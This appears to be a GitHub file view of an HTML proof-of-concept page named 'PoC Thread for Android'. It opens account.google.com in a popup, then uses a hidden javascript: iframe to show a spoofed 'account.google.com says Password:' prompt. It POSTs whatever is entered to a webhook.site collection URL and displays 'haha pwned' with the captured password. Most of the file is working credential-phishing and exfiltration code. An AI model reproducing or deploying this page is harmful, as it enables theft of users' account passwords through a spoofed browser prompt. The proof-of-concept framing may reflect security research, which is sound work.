-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy paththreads.html
More file actions
104 lines (100 loc) · 4.53 KB
/
threads.html
File metadata and controls
104 lines (100 loc) · 4.53 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PoC Thread for Android</title>
<style>
body {
margin: 0;
padding: 20px;
font-family: Arial, sans-serif;
background: #f0f0f0;
text-align: center;
}
button {
display: inline-block;
padding: 15px 30px;
background: #ff4444;
color: white;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
margin-top: 50px;
border: none;
}
button:hover { background: #cc0000; }
#status {
margin-top: 20px;
color: #333;
font-size: 24px;
font-weight: bold;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<h2>Click to Trigger Spoofed Prompt</h2>
<button id="triggerBtn">Spoof Prompt</button>
<div id="status"></div>
<form id="hiddenForm" class="hidden" method="POST" action="https://webhook.site/46a1ff0d-65fb-41b4-a384-0ed267ed2a90/submit">
<input type="text" id="passwordInput" name="password">
</form>
<script>
document.getElementById('triggerBtn').onclick = () => {
// Step 1: Open a legit domain in a new window
const w = window.open('https://account.google.com/');
if (!w) {
document.getElementById('status').innerHTML = 'Popup blocked. Fallback not implemented.';
return;
}
// Step 2: Create hidden iframe and trigger prompt after 2s
setTimeout(() => {
const iframe = document.createElement('iframe');
iframe.src = 'javascript:(function(){var p=prompt("account.google.com says Password:");if(p){document.write(\'<form method="POST" action="https://webhook.site/46a1ff0d-65fb-41b4-a384-0ed267ed2a90/submit" id="iframeForm"><input type="hidden" name="password" value="\'+p+\'"><input type="submit"></form>\');document.getElementById("iframeForm").submit();}})()';
iframe.style.display = 'none';
document.body.appendChild(iframe);
// Step 3: Listen for form submission and update status
const hiddenForm = document.getElementById('hiddenForm');
hiddenForm.onsubmit = (e) => {
e.preventDefault(); // Prevent actual submission
const password = document.getElementById('passwordInput').value; // This won't work directly; see workaround below
if (password) {
document.getElementById('status').innerHTML = 'haha pwned<br>Password captured: ' + password;
} else {
document.getElementById('status').innerHTML = 'haha pwned<br>No password captured.';
}
// Clean up
setTimeout(() => {
document.body.removeChild(iframe);
if (w && !w.closed) w.close();
}, 2000);
};
// Workaround: Poll for iframe content change (since direct access is restricted)
const checkIframe = setInterval(() => {
try {
const iframeDoc = iframe.contentDocument || iframe.contentWindow.document;
const iframeForm = iframeDoc.getElementById('iframeForm');
if (iframeForm) {
const pwd = iframeForm.querySelector('input[name="password"]').value;
if (pwd) {
document.getElementById('status').innerHTML = 'haha pwned<br>Password captured: ' + pwd;
clearInterval(checkIframe);
setTimeout(() => {
document.body.removeChild(iframe);
if (w && !w.closed) w.close();
}, 2000);
}
}
} catch (e) {
// Cross-origin error; proceed with cleanup
clearInterval(checkIframe);
}
}, 500);
}, 2000);
};
</script>
</body>
</html>